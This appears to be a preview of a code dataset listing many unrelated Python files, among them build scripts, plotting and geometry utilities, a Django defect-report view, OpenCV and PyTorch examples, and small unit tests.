text stringlengths 8 6.05M |
|---|
import os
import sys
import shutil
import py2exe
import argparse
import subprocess
import compileall
from distutils.core import setup
from zipfile import ZipFile
parser = argparse.ArgumentParser(description='Emmaus House Food Pantry Setup')
parser.add_argument('-c', '--clean', action='store_true',
default=False, help='Clean all built files.')
parser.add_argument('-p', '--pack', action='store_true',
default=False, help='Pack app files into archive.')
parser.add_argument('-b', '--build', action='store_true',
default=False, help='Build executable.')
parser.add_argument('-m', '--make', action='store_true',
default=False, help='Make fresh database file.')
def clean():
if os.path.exists('./emmaus_house_food_pantry.zip'):
print 'Removing archive: ./emmaus_house_food_pantry.zip ...'
os.remove('./emmaus_house_food_pantry.zip')
if os.path.exists('./build'):
print 'Removing directory: ./build ...'
shutil.rmtree('./build')
if os.path.exists('./dist'):
print 'Removing directory: ./dist ...'
shutil.rmtree('./dist')
if os.path.exists('./django.log'):
print 'Removing log: ./django.log ...'
os.remove('./django.log')
def make():
import settings
if settings.STANDALONE:
raise Exception('STANDALONE setting True while making database')
if os.path.exists('./pantry.db'):
print 'Removing previous database: ./pantry.db ...'
os.remove('./pantry.db')
print 'Creating new database ...'
subprocess.check_call('python.exe manage.py syncdb --noinput')
print 'Loading data in new database ...'
subprocess.check_call('python.exe manage.py loaddata data\\initial_v2.json')
def pack():
if not os.path.exists('./pantry.db'):
raise Exception('Missing database file: ./pantry.db')
print 'Compiling python files ...'
compileall.compile_dir('.', force=True)
print 'Composing list of files for archive ...'
files = []
for dirpath, dirnames, filenames in os.walk("."):
for filename in filenames:
if dirpath.startswith('.\\.git'): continue
files.append(os.path.join(dirpath, filename))
print 'Creating archive file ...'
with ZipFile('emmaus_house_food_pantry.zip', 'w') as food_pantry_zip:
for filename in files:
food_pantry_zip.write(filename)
def build():
import settings
if not settings.STANDALONE:
raise Exception('STANDALONE setting False while building webapp')
print 'Reading archive into memory ...'
with open('./emmaus_house_food_pantry.zip', 'rb') as food_pantry_zip:
food_pantry_data = food_pantry_zip.read()
print 'Invoking py2exe to generate the executable ...'
excludes = ['pywin', 'pywin.debugger', 'pywin.debugger.dbgcon',
'pywin.dialogs', 'pywin.dialogs.list', 'Tkconstants',
'Tkinter', 'tcl', 'zmq', 'Pythonwin', 'IPython', 'MySQLdb',
'PIL', 'matplotlib', 'nose', 'numpy', 'pyreadline', 'scipy',
'win32', 'win32com']
sys.argv[1:] = ['py2exe']
setup(windows=[{'script': 'webapp.py',
'other_resources':
[(u'FOOD_PANTRY_DATA', 1, food_pantry_data)]}],
options = {'py2exe': {'bundle_files': 1,
'dll_excludes': ['w9xpopen.exe', 'MSVCP90.dll',
'mswsock.dll', 'powrprof.dll'],
'excludes': excludes,
'packages': ['django', 'email', 'win32api',
'cherrypy', 'appdirs']}},
zipfile = None)
if __name__ == '__main__':
args = parser.parse_args()
if args.clean: clean()
if args.pack: pack()
if args.build: build()
if args.make: make()
else:
class DummyArgs:
def __getattr__(self, field):
return None
args = DummyArgs()
|
import spidev
import time
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz=16000000 #16Mhz
#spi.max_speed_hz=32000000 #32Mhz
while True:
#resp = spi.xfer2( [0x80, 0xFF] )
resp = spi.xfer2( [0xFF] )
print resp
#print "r2"+resp[1]
time.sleep(1)
|
import sys
import argparse
from misc.Logger import logger
from core.base import base
from misc import Misc
class env(base):
def __init__(self, global_options=None):
self.global_options = global_options
logger.info('Env module entry endpoint')
self.cli = Misc.cli_argument_parse()
def start(self):
logger.info('Invoked starting point for env')
parser = argparse.ArgumentParser(description='ec2 tool for devops', usage='''kerrigan.py env <command> [<args>]
Second level options are:
check
''' + self.global_options)
parser.add_argument('command', help='Command to run')
args = parser.parse_args(sys.argv[2:3])
if not hasattr(self, args.command):
logger.error('Unrecognized command')
parser.print_help()
exit(1)
getattr(self, args.command)()
def check(self):
# FIXME this whole is broken, and should be dynamic
logger.info("Doing config check in AWS")
parser = argparse.ArgumentParser(description='ec2 tool for devops', usage='''kerrigan.py env check [<args>]]
''' + self.global_options)
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
def draw(x, y, Edges):
plt.scatter(x, y)
for edge in Edges:
plt.plot([x[edge[0]], x[edge[1]]], [y[edge[0]], y[edge[1]]], 'k-')
plt.show()
def drawRegret(x, y, Edges):
colors = cm.rainbow(np.linspace(0, 1, len(Edges)))
for cl, group in enumerate(Edges):
for ele in group:
plt.scatter(x[ele], y[ele], color=colors[cl])
plt.show()
|
from pytrends.pyGTrends import pyGTrends
import time
from random import randint
google_username = "an_email@gmail.com"
google_password = "password"
path = ""
# connect to Google
connector = pyGTrends(google_username, google_password)
# make request
connector.request_report("Pizza")
# wait a random amount of time between requests to avoid bot detection
time.sleep(randint(5, 10))
# download file
connector.save_csv(path, "pizza")
# get suggestions for keywords
keyword = "milk substitute"
data = connector.get_suggestions(keyword)
print(data)
|
from django.db import models
from recurrence.fields import RecurrenceField
class Course(models.Model):
title = models.CharField(max_length=100)
schedule = RecurrenceField()
|
from AlgebraicDataType import ADT
def nt_to_tuple(nt):
return tuple((getattr(nt, f) for f in nt.__class__._fields))
class PatternMatchBind(object):
def __init__(self, name):
self.name = name
class PatternMatchListBind(object):
def __init__(self, head, tail):
self.head = head
self.tail = tail
def pattern_match(value, pattern, env=None):
env = {} if env is None else env
if isinstance(pattern, PatternMatchBind):
if pattern.name in env:
raise SyntaxError("Conflicting definitions: {}" % pattern.name)
env[pattern.name] = value
return True, env
elif isinstance(pattern, PatternMatchListBind):
head, tail = list(value[:len(pattern.head)]), value[len(pattern.head):]
matches, env = pattern_match(head, pattern.head, env)
if matches:
return pattern_match(tail, pattern.tail, env)
return False, env
elif type(value) == type(pattern):
if isinstance(value, ADT):
return pattern_match(nt_to_tuple(value), nt_to_tuple(pattern), env)
elif hasattr(value, "__iter__"):
matches = []
if len(value) != len(pattern):
return False, env
for v, p in zip(value, pattern):
match_status, env = pattern_match(v, p, env)
matches.append(match_status)
return all(matches), env
elif value == pattern:
return True, env
return False, env
|
from time import time
def my_dec(func):
def wrapper(*args, **kwargs):
t1 = time()
res = func(*args, **kwargs)
t2 = time()
t3 = t2 - t1
print(f'It took {t3} seconds')
return res
return wrapper
@my_dec
def my_own_range(num, start=0):
new_list = []
while start < num:
start += 1
new_list.append(start)
return new_list
@my_dec
def py_range(n):
res = []
for i in range(n):
res.append(i)
return res
l1 = py_range(1000000)
l2 = my_own_range(1000000)
@my_dec
def generator(num):
for i in range(num):
yield i
n = generator(10)
print(next(n))
print(next(n))
print(next(n))
|
import numpy as np
class ColorPalette:
def __init__(self, numColors):
np.random.seed(1)
self.colorMap = np.array([[255, 0, 0],
[50, 150, 0],
[0, 0, 255],
[80, 128, 255],
[255, 230, 180],
[255, 0, 255],
[0, 255, 255],
[255, 255, 0],
[0, 255, 0],
[200, 255, 255],
[255, 200, 255],
[100, 0, 0],
[0, 100, 0],
[128, 128, 80],
[0, 50, 128],
[0, 100, 100],
[0, 255, 128],
[0, 128, 255],
[255, 0, 128],
[128, 0, 255],
[255, 128, 0],
[128, 255, 0],
], dtype=np.uint8)
self.colorMap = np.concatenate([self.colorMap, self.colorMap], axis=0)
#self.colorMap = np.maximum(self.colorMap, 1)
if numColors > self.colorMap.shape[0]:
self.colorMap = np.concatenate([self.colorMap, np.random.randint(255, size = (numColors, 3), dtype=np.uint8)], axis=0)
pass
return
def getColorMap(self):
return self.colorMap
def getColor(self, index):
if index >= colorMap.shape[0]:
return np.random.randint(255, size = (3), dtype=np.uint8)
else:
return self.colorMap[index]
pass
def intersectFaceLine(face, line, return_ratio=False):
faceNormal = np.cross(face[1] - face[0], face[2] - face[0])
faceArea = 0
for c in xrange(1, len(face) - 1):
faceArea += np.linalg.norm(np.cross(face[c] - face[0], face[c + 1] - face[c])) / 2
pass
faceNormal /= np.maximum(faceArea * 2, 1e-4)
faceOffset = np.sum(faceNormal * face[0])
offset_1 = np.sum(faceNormal * line[0])
offset_2 = np.sum(faceNormal * line[1])
if offset_2 == offset_1:
if return_ratio:
return False, 0
else:
return False
alpha = (faceOffset - offset_1) / (offset_2 - offset_1)
if alpha <= 0 or alpha >= 1:
if return_ratio:
return False, alpha
else:
return False
point = line[0] + alpha * (line[1] - line[0])
intersectionArea = 0
for c in xrange(len(face)):
intersectionArea += np.linalg.norm(np.cross(point - face[c], point - face[(c + 1) % len(face)])) / 2
continue
#print(intersectionArea, faceArea)
if intersectionArea <= faceArea + 1e-4:
if return_ratio:
return True, alpha
else:
return True
else:
if return_ratio:
return False, alpha
else:
return False
return
if __name__ == '__main__':
line = [np.array([ 2.4764291 , 4.37349266, -9.5168555 ]), np.array([ 2.4764291 , 4.37349266, 10.4831445 ])]
face = [np.array([2.1361478 , 0.01942726, 0.06335368]), np.array([8.41647591, 2.27955277, 0.06335368]), np.array([6.15570054, 8.74293862, 0.06335368]), np.array([-0.12478519, 6.48326369, 0.06335368])]
intersection, ratio = intersectFaceLine(face, line, return_ratio=True)
print(face)
print(line)
print(intersection, ratio)
exit(1)
|
from django.http import HttpResponse
import simplejson
import logging
from v1_meta import V1Meta
from datetime import datetime
import xml.etree.cElementTree as ET
from defects.v1defect import V1Defect
from django.shortcuts import render
# Create your views here.
def GetDefectsNumber(request):
t1 = datetime.now()
modules = {'pmr': '454039', 'pmt': '567434', 'mtr': '567436', 'scm': '611410', 'vrp': '611415', 'cal': '805607',
'tgm': '567435', 'cmp': '551644', 'pe': '294215'}
status = ['_unres', '_in_testing', '_res']
fields = ['SecurityScope', 'Custom_SLA2.Name', 'Type.Name', 'Custom_ConfigurationType.Name', 'Status.Name']
p1p2 = ['P1', 'P2']
cfg_type = ['Universal (Universal features require 30 days pre-notice.)', 'Admin Opt-out', 'Provisioning Opt-out']
in_testing = ['Dev Complete', 'In Testing']
attr_type = {'type': 0, 'config': 0, 'sla': 0, 'status': 0, 'project': 0, 'project.name': 0 }
some_data = {}
scope = ''
sel = ''
for each_module in modules.iterkeys():
for module in status:
some_data[each_module + module] = 0
for scope_id in modules.itervalues():
if scope == '':
scope = "SecurityScope='Scope:" + scope_id + "'"
else:
scope = scope + '|' + "SecurityScope='Scope:" + scope_id + "'"
for field in fields:
if sel == '':
sel = field
else:
sel = sel + ',' + field
v1 = V1Meta()
query = v1.url + "/rest-1.v1/Data/Defect?Sel=" + sel + "&Where=" + scope
dom = v1.get_xml(query)
doc = ET.fromstring(dom)
root = doc
for node_attribute in range(0, 6, 1):
if root[0][node_attribute].attrib['name'] == 'Type.Name':
attr_type['type'] = node_attribute
if root[0][node_attribute].attrib['name'] == 'Custom_ConfigurationType.Name':
attr_type['config'] = node_attribute
if root[0][node_attribute].attrib['name'] == 'Custom_SLA2.Name':
attr_type['sla'] = node_attribute
if root[0][node_attribute].attrib['name'] == 'Status.Name':
attr_type['status'] = node_attribute
if root[0][node_attribute].attrib['name'] == 'SecurityScope':
attr_type['project'] = node_attribute
if root[0][node_attribute].attrib['name'] == 'SecurityScope.Name':
attr_type['project.name'] = node_attribute
for node_asset in root:
for module in modules.iteritems():
if node_asset[attr_type['project']][0].attrib['idref'].split(':')[1] == module[1]:
module_key = module[0]
if node_asset[attr_type['sla']].text in p1p2 \
or node_asset[attr_type['type']].text == 'Regression' \
or (node_asset[attr_type['sla']].text == 'P3' and node_asset[attr_type['type']].text == 'New' and node_asset[
attr_type['config']].text in cfg_type):
if node_asset[attr_type['status']].text == 'Done':
some_data[module_key + '_res'] += 1
elif node_asset[attr_type['status']].text in in_testing:
some_data[module_key + '_in_testing'] += 1
else:
some_data[module_key + '_unres'] += 1
t2 = datetime.now()
logging.error("Timer for defect report function\nTotal time spent: " + str((t2 - t1).seconds) + " seconds.")
data = simplejson.dumps(some_data)
return HttpResponse(data, mimetype='application/json')
def DefectDetails(request):
parameters = {}
for para in request.GET.iteritems():
parameters[para[0].encode('utf-8')] = para[1].encode('utf-8')
print parameters
modules = {'pmr': '454039', 'pmt': '567434', 'mtr': '567436', 'scm': '611410', 'vrp': '611415', 'cal': '805607',
'tgm': '567435', 'cmp': '551644', 'pe': '294215'}
status_list = ['_unres', '_in_testing', '_res']
fields = ['ID.Name', 'ID.Number', 'SecurityScope.Name', 'Status.Name', 'Timebox.Name', 'SecurityScope', 'Custom_SLA2.Name', 'Type.Name', 'Custom_ConfigurationType.Name', 'Owners.Name']
# attr_type = {'status': 0, 'project': 0, 'sprint': 0}
status_mapping = {
'Unresolved': ['None', 'No Requirements', 'Requirements Done', 'Planned', 'In Progress', 'Awaiting Clarification', 'Awaiting Code Fix', 'Blocked', 'Reopened'],
'In Testing': ['Dev Complete', 'In Testing'],
'Closed': ['Done']
}
p1p2 = ['P1', 'P2']
cfg_type = ['Universal (Universal features require 30 days pre-notice.)', 'Admin Opt-out', 'Provisioning Opt-out']
scope = ''
sel = ''
backlogItems = {}
defect_list = []
v1_id = ''
# setup scope for all modules
# for scope_id in modules.itervalues():
# if scope == '':
# scope = "SecurityScope='Scope:" + scope_id + "'"
# else:
# scope = scope + '|' + "SecurityScope='Scope:" + scope_id + "'"
# single scope from request
scope = "SecurityScope='Scope:" + modules[str(parameters['module']).lower()] + "'"
for field in fields:
if sel == '':
sel = field
else:
sel = sel + ',' + field
v1 = V1Meta()
query = v1.url + "/rest-1.v1/Data/Defect?Sel=" + sel + "&Where=" + scope
print query
dom = v1.get_xml(query)
doc = ET.fromstring(dom)
root = doc
for node_asset in root:
id = node_asset.attrib['id'].split(':')[1]
backlogItems[id] = {}
for node_attribute in node_asset:
for attr in fields:
if node_attribute.attrib['name'] == attr:
node_value = node_attribute.find('Value')
if node_value != None:
backlogItems[id][attr] = node_value.text.split(" ")[0]
else:
backlogItems[id][attr] = node_attribute.text
backlogItems[id]['oid'] = node_asset.attrib['id']
for item in backlogItems.iteritems():
for i in item[1].iteritems():
if i[0] == 'ID.Number':
v1_id = str(i[1])
elif i[0] == 'ID.Name':
try:
title = str(i[1])
except Exception:
title = "=== ASCII character detected, please modify the title!!! ==="
elif i[0] == 'Timebox.Name':
sprint = str(i[1]).replace(' ', '')
elif i[0] == 'Status.Name':
status = str(i[1])
elif i[0] == 'oid':
oid = str(i[1])
elif i[0] == 'SecurityScope.Name':
start = str(i[1]).find('(')+1
end = str(i[1]).find(')')
module = str(i[1])[start:end]
elif i[0] == 'Custom_SLA2.Name':
sla = str(i[1])
elif i[0] == 'Type.Name':
type = str(i[1])
elif i[0] == 'Custom_ConfigurationType.Name':
configType = str(i[1])
elif i[0] == 'Owners.Name':
owner = str(i[1])
if status in status_mapping[parameters['status']]:
if sla in p1p2 \
or type == 'Regression' \
or (sla == 'P3' and type == 'New' and configType in cfg_type):
custom_status = parameters['status']
if configType == cfg_type[0]:
configType = configType.split(" ")[0]
v1_tmp = V1Defect(v1_id=v1_id, oid=oid, title=title, custom_status=custom_status, module=module, sprint=sprint, status=status, sla=sla, type=type, configType=configType, owner=owner)
defect_list.append(v1_tmp)
return render(request, 'defectdetails.html', {'items': defect_list})
|
import matplotlib.pyplot as pl
import numpy as np
f = open('angular_data.txt','r')
str = f.read()
data = str.split();
desired = []
for i in range(len(data)-1):
desired.append(data[0])
feedback = data[1:len(data)]
t = np.arange(0,len(feedback),1)
xlimit = len(feedback)-1
ylimit = int(max(data))+1000
pl.plot(t,feedback,'r')
pl.plot(t,desired,'b')
pl.title('system response')
pl.xlabel('time')
pl.ylabel('angular velocity')
pl.axis([0, xlimit, 0, ylimit])
pl.show()
|
n = int(input())
t = [1,2]
for i in range(2,n+1,1):
res = t[i - 1] + t[i-2]
t.append(res)
print(t[n-1])
|
import csv
data = [[1, "a", 1.1] # 리스트를 요소로 포함하는 리스트 생성
[2, "b", 1.2],
[3, "c", 1.3]]
with open("output.csv", "w") as f:
wr = csv.writer(f) # csv 파일에 저장
for row in data:
wr.writerow(row |
import numpy as np
import cv2
#이미지 Contour : 같은 값을 가진 곳을 연결한 선
#이미지에서 Contour를 찾기 전에 threshold나 Canny edge detection을 적용하는 것이 좋다.
#Contour를 찾고자 하는 대상은 흰색으로, 배경은 검정색으로 변경해야함
def contour():
img = cv2.imread('images/globe.jpg')
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thr = cv2.threshold(imgray, 127, 255, 0)
#imgray를 thresholding하여 그 값을 thresh로 한다.
#이를 cv2.findContours()함수에 넘겨 contour를 찾는다.
_, contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#thr, 이미지에서 찾은 contour, contour들 간의 계층 구조를 리턴
#contour만 관심이 있으므로, 리턴값 3개 중 필요없는 인자는 '_'로 리턴
#thresh: contour 찾기를 할 소스 이미지, thresholding을 통해 변환된 바이너리 이미지
#cv2.RETR_TREE: 두 번째 인자는 contour 추출 모드이며, 2번째 리턴값이 hierarchy의 값에 영향을 준다.
#_EXTERNAL : 이미지의 가장 바깥쪽의 contour만 추출
#_LIST : contour 간 계층구조 상관관계를 고려하지 않고 contour를 추출
#_CCOMP : 모든 contour를 추출한 후, 2단계 contour 계층 구조로 구성.
#1단계 계층에서는 외곽 경계 부분을, 2단계 계층에서는 구멍의 경계부분을 나타내는 contour로 구성됨
#_TREE : 이미지에서 모든 contour를 추출하고 contour들간의 상관관계를 추출함
#CHAIN_APPROX_SIMPLE: contour 근사 방법
#_APPROX_NONE : contour를 구성하는 모든 점을 저장함.
#_APPROX_SIMPLE : contour의 수평, 수직, 대각선 방향의 점은 모두 버리고 끝 점만 남겨둠
#예로 직사각형에서 4개의 모서리점만 남기고 다 버림
#_APPROX_TC89_1 : Teh-Chin 연결 근사 알고리즘을 적용
cv2.drawContours(img, contours, -1, (0, 0, 255), 1)
#찾은 contour를 실제로 그리는 함수
#-1 : img에 실제로 그릴 contour 인덱스 파라미터, 이 값이 음수이면 모든 contour를 그림
#(0, 255, 0) : contour 선의 bgr 색상값, 여기서는 green
#1: 선의 두께
cv2.imshow('thresh', thr)
cv2.imshow('contour', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
contour()
|
import socket
clisock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
clisock.connect( ('', 8000) )
clisock.send("Hi I am the client\n")
print clisock.recv(100)
clisock.close()
|
# %%
from myApp.models import Grades.Students, Grades
from django.utils import timezone
from datatime import *
# %%
|
import sklearn.linear_model
from sklearn import svm
import numpy as np
class SVM:
def __init__(self,C=1.0,kernel='linear'):
self.svm = svm.SVC(C,kernel)
def learn(self,X,T):
self.svm.fit(X,T)
def predict(self,X,T):
count = 0
presission = [0,0,0,0,0]
recall = [0,0,0,0,0]
ans = [0,0,0,0,0]
for i in xrange(len(X)):
for j in range(5):
if self.svm.predict(X[i])[0] == j:
recall[j] += 1
if T[i] == j:
presission[j] += 1
if T[i] == self.svm.predict(X[i])[0]:
count += 1
for h in range(5):
if T[i] == h:
ans[h] += 1
break
return count,len(X),presission,ans,recall
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys, operator, math
from sys import argv
with open(argv[1], 'r') as f:
with open('scores.txt','w') as fScores:
for line in f:
wordScore = line.split()
score = wordScore[1]
fScores.write(score + ' ')
|
input_string = input()
dom = input_string.index(".")
print(input_string[dom+1:]) |
import numpy as np
import matplotlib.pyplot as plt
from src.shaft_secant_piles import plot_cylinder_2points, set_axis_equal_3d
def get_parameters_wall_secant_piles(D, a, L, H_drilling_platform, v=0.75):
""" Gets parameters for secant piled wall
D: pile diameter [m]
a: C/C pile spacing b/w two neighboring piles [m]
L: pile length [m]
v: percentage of verticality [%]
H_drilling_platform: height of drilling platform above top of piles [m]
"""
x0 = H_drilling_platform*v/100 # deviation at top of pile when drilling platform is above, m
t_top = D - a - 2*x0 # overcut/ interlock
# t_top = t_top - 2*x0
d_top = 2*np.sqrt((D/2)**2 - (a/2)**2) # overlapped thickness
x = x0 + L*v/100 # deviation at bottom of wall, m
t_eff = t_top - 2*x # effective/overlapped thickness at toe of wall, m
d_eff = np.nan
if t_eff > 0:
d_eff = 2*np.sqrt((D/2)*t_eff - (t_eff/2)**2) # overlapped thickness, m
else:
d_eff = np.nan
return t_top, d_top, x0, x, t_eff, d_eff
def plot_wall_secant_piles_2items(a, D, dev_0=0.0, dev=0.0, wall_name='Wall'):
x = np.array([D/2, D/2 + a])
y = np.zeros_like(x)
pile_types = ['primary', 'secondary']
pile_colors = ['white', 'white']
fig, ax = plt.subplots(2, 1)
# worst-case deviations
x0 = np.array([x[0] + dev_0, x[1] - dev_0]) # x top
y0 = y
x[0] = x[0] - dev # x bottom
x[1] = x[1] + dev # x bottom
# top of shaft
for i in range(0,len(x),2):
circle_p = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
ax[0].add_patch(circle_p)
for i in range(1, len(x), 2):
circle_s = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
ax[0].add_patch(circle_s)
# bottom of shaft
for i in range(0,len(x),2):
circle_p = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
ax[1].add_patch(circle_p)
for i in range(1, len(x), 2):
circle_s = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
ax[1].add_patch(circle_s)
ax[0].set_title(wall_name + ' at top (deviation {0:.1f} cm)'.format(dev_0*100))
ax[1].set_title(wall_name + ' at base (deviation {0:.1f} cm)'.format(dev*100))
for axi in ax:
axi.autoscale_view()
axi.set_aspect('equal')
#ax.legend()
#handles, labels = plt.gca().get_legend_handles_labels()
#by_label = OrderedDict(zip(labels, handles))
#plt.legend(by_label.values(), by_label.keys())
#plt.show()
return fig
def plot_wall_secant_piles(n_pieces, a, D, dev_0=0.0, dev=0.0, wall_name='Wall'):
x = np.linspace(0.0, (n_pieces-1)*a, n_pieces)
y = np.zeros_like(x)
pile_types = ['primary', 'secondary']
#pile_colors = ['blue', 'red']
pile_colors = ['white', 'white']
fig, ax = plt.subplots(2, 1)
# deviations
#angles_deviation = 2*np.pi*np.random.rand(angles.size) # random angle of deviation for each of the piles
angles_deviation = 2*np.pi*np.random.uniform(0, 1, x.size) # random angle of deviation for each of the piles
x0 = x + dev_0*np.cos(angles_deviation) # x top
y0 = y + dev_0*np.sin(angles_deviation) # y top
x = x + dev*np.cos(angles_deviation) # x bottom
y = y + dev*np.sin(angles_deviation) # y bottom
# top of shaft
for i in range(0,len(x),2):
circle_p = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
ax[0].add_patch(circle_p)
for i in range(1, len(x), 2):
circle_s = plt.Circle((x0[i],y0[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
ax[0].add_patch(circle_s)
# bottom of shaft
for i in range(0,len(x),2):
circle_p = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[0], edgecolor='black', zorder=0, alpha=0.3, label=pile_types[0])
ax[1].add_patch(circle_p)
for i in range(1, len(x), 2):
circle_s = plt.Circle((x[i],y[i]), D/2, facecolor=pile_colors[1], edgecolor='black', zorder=0, alpha=0.3, linewidth=2.0, label=pile_types[1])
ax[1].add_patch(circle_s)
ax[0].set_title(wall_name + ' at top')
ax[1].set_title(wall_name + ' at base (deviation {0:.1f} cm)'.format(dev*100))
for axi in ax:
axi.autoscale_view()
axi.set_aspect('equal')
#ax.legend()
#handles, labels = plt.gca().get_legend_handles_labels()
#by_label = OrderedDict(zip(labels, handles))
#plt.legend(by_label.values(), by_label.keys())
#plt.show()
return fig
def plot_wall_secant_piles_3d(n_pieces, a, D, L, dev0=0.0, dev=0.0, wall_name='Wall'):
""" Plots shaft in 3D with random drilling deviation
dev0: maxinum deviation at top of pile [m]
dev: maxinum deviation at base of pile [m]"""
x = np.linspace(0.0, (n_pieces-1)*a, n_pieces)
y = np.zeros_like(x)
# deviations
#angles_deviation = 2*np.pi*np.random.rand(angles.size) # random angle of deviation for each of the piles
angles_deviation = 2*np.pi*np.random.uniform(0, 1, x.size) # random angle of deviation for each of the piles
x_dev0 = x + dev0*np.cos(angles_deviation) # x top
y_dev0 = y + dev0*np.sin(angles_deviation) # y top
x_dev = x + dev*np.cos(angles_deviation) # x bottom
y_dev = y + dev*np.sin(angles_deviation) # y bottom
fig = plt.figure()
#ax = fig.gca(projection='3d')
ax = fig.add_subplot(projection='3d')
if n_pieces < 3:
ax.view_init(azim=90.0, elev=0.0)
for i in range(0,len(x),2):
point0 = np.array([x_dev[i], y_dev[i], 0]) # bottom
point1 = np.array([x_dev0[i], y_dev0[i], L]) # top
plot_cylinder_2points(ax, point0, point1, D/2)
for i in range(1, len(x), 2):
point0 = np.array([x_dev[i], y_dev[i], 0]) # bottom
point1 = np.array([x_dev0[i], y_dev0[i], L]) # top
plot_cylinder_2points(ax, point0, point1, D/2, color='orange')
ax.set_title(wall_name + ' 3D')
#ax.set_aspect('equal')
set_axis_equal_3d(ax)
#plt.show()
return fig
def plot_wall_secant_piles_3d_2items(n_pieces, a, D, L, dev0=0.0, dev=0.0, wall_name='Wall'):
""" Plots shaft in 3D with random drilling deviation
dev0: maxinum deviation at top of pile [m]
dev: maxinum deviation at base of pile [m]"""
x = np.array([D/2, D/2 + a])
y = np.zeros_like(x)
# worst-case deviations
x0 = np.array([x[0] + dev0, x[1] - dev0]) # x top
y0 = y # y top
x[0] = x[0] - dev # x bottom
x[1] = x[1] + dev # x bottom
fig = plt.figure()
#ax = fig.gca(projection='3d')
ax = fig.add_subplot(projection='3d')
if n_pieces < 3:
ax.view_init(azim=90.0, elev=0.0)
for i in range(0,len(x),2):
point0 = np.array([x[i], y[i], 0]) # bottom
point1 = np.array([x0[i], y0[i], L]) # top
plot_cylinder_2points(ax, point0, point1, D/2)
for i in range(1, len(x), 2):
point0 = np.array([x[i], y[i], 0]) # bottom
point1 = np.array([x0[i], y0[i], L]) # top
plot_cylinder_2points(ax, point0, point1, D/2, color='orange')
ax.set_title(wall_name + ' 3D')
#ax.set_aspect('equal')
set_axis_equal_3d(ax)
#plt.show()
return fig |
#coding:utf-8
def script(s, player=None):
from NaoQuest.quest import Quest
from NaoCreator.setting import Setting
import NaoCreator.Tool.speech_move as SM
if not player:
Setting.error("Error in execution of post_script of objective \"ChoixService\": player is None")
return
print s.__dict__
if hasattr(s, "kw_answer"):
print s.kw_answer
# ajoue des quêtes en fonction du choix de l'utilisateur
if s.kw_answer == "éxplication" or s.kw_answer == "éxplications":
print "ajoue preparation jardin"
new_qst = Quest(player.current_scenario.inner_name, "PreparationJardin")
else:
SM.speech_and_move(u"Ajoue de l'arrosage")
print "ajoue arrosage"
new_qst = Quest(player.current_scenario.inner_name, "Arrosage")
l = len(player.current_quest.next_quests)
new_qst.branch_id = l + 1
player.current_quest.next_quests.append(new_qst)
|
import unittest
from neo.rawio.winwcprawio import WinWcpRawIO
from neo.test.rawiotest.common_rawio_test import BaseTestRawIO
class TestWinWcpRawIO(BaseTestRawIO, unittest.TestCase, ):
rawioclass = WinWcpRawIO
entities_to_test = ['File_winwcp_1.wcp']
files_to_download = entities_to_test
if __name__ == "__main__":
unittest.main()
|
import click
import torch
from models.rnn_attention_s2s import RnnAttentionS2S
from utils import prepareData
@click.command(help="train env_name exp_dir data_path")
@click.option("-d","--data-path", default="data", type=str)
@click.option("-a", "--architecture", default="rnn_attention_s2s", type=str)
@click.option("-nit", "--n-iters", default=10000, type=int)
@click.option("-ml", "--max-length", default=10, type=int)
@click.option("-hs", "--hidden-size", default=256, type=int)
@click.option("-lr", "--learning_rate", default = 0.01)
@click.option("-tfr", "--teacher-forcing-ratio", default=0.5)
def main(
data_path,
architecture,
n_iters,
max_length,
hidden_size,
learning_rate,
teacher_forcing_ratio,
):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
input_lang, output_lang, pairs = prepareData('eng', 'fra', path=data_path, max_length= max_length, prefixes=None)
if architecture=="rnn_attention_s2s":
model = RnnAttentionS2S(input_lang, output_lang, max_length=max_length, hidden_size=hidden_size, device=device)
else:
raise Exception('Unknown architecture')
model.train(pairs, n_iters = n_iters, learning_rate=learning_rate, max_length=max_length, teacher_forcing_ratio=teacher_forcing_ratio)
if __name__ == '__main__':
main()
|
import sys
sys.path.append('../500_common')
import lib_curation
import lib_ss
import time
from bs4 import BeautifulSoup
#--------------
# soup = lib_ss.main("/Users/nakamurasatoru/git/d_genji/genji_curation/src/500_common/Chrome11", "Profile 1")
soup = BeautifulSoup(open("data/result.html"), "lxml")
tr_list = soup.find_all("tr")
print(len(tr_list))
time.sleep(5)
dirname0 = "kyoto02"
dirname = "kyoto02_kuronet"
manifests = [
"https://rmda.kulib.kyoto-u.ac.jp/iiif/metadata_manifest/RB00007030/manifest.json"
]
lib_curation.main(dirname0, dirname, manifests, soup) |
import unittest
from katas.kyu_7.double_char import double_char
class DoubleCharTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(double_char('String'), 'SSttrriinngg')
def test_equals_2(self):
self.assertEqual(double_char('Hello World'), 'HHeelllloo WWoorrlldd')
def test_equals_3(self):
self.assertEqual(double_char('1234!_ '), '11223344!!__ ')
|
import os
import yaml
def loadyamlfile(yamlfile):
configfilelist = []
with open(yamlfile, encoding='utf-8') as f:
y = yaml.load_all(f)
for data in y:
configfilelist.append(data)
return configfilelist
def getnessussearchyaml():# yamlfile里面放配置文件
yamllist = []
dirpath = os.path.dirname((os.path.abspath(__file__)))
yamldir = os.path.join(dirpath,'yamlfile')
for file in os.listdir(yamldir):
if file.endswith('yml'):
